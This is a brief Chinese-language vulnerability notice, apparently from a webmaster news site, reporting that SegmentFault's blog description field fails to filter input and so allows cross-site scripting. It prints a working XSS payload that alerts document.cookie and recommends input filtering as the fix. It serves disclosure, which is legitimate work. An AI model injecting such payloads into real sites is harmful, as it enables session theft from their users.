alert(document.cookie);&" />

SegmentFault页面过滤不严格可致XSS下载

博客设置“博客描述”未过滤,可致跨站攻击

http://segmentfault.com/

 

"><script>alert(document.cookie);</script><meta type="XSS

修复方案:

进行输入过滤

上一篇: [公开漏洞]同花顺某站SQL注入(dba权限)
下一篇: [公开漏洞]263通信某分站存在SQL注射漏洞
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细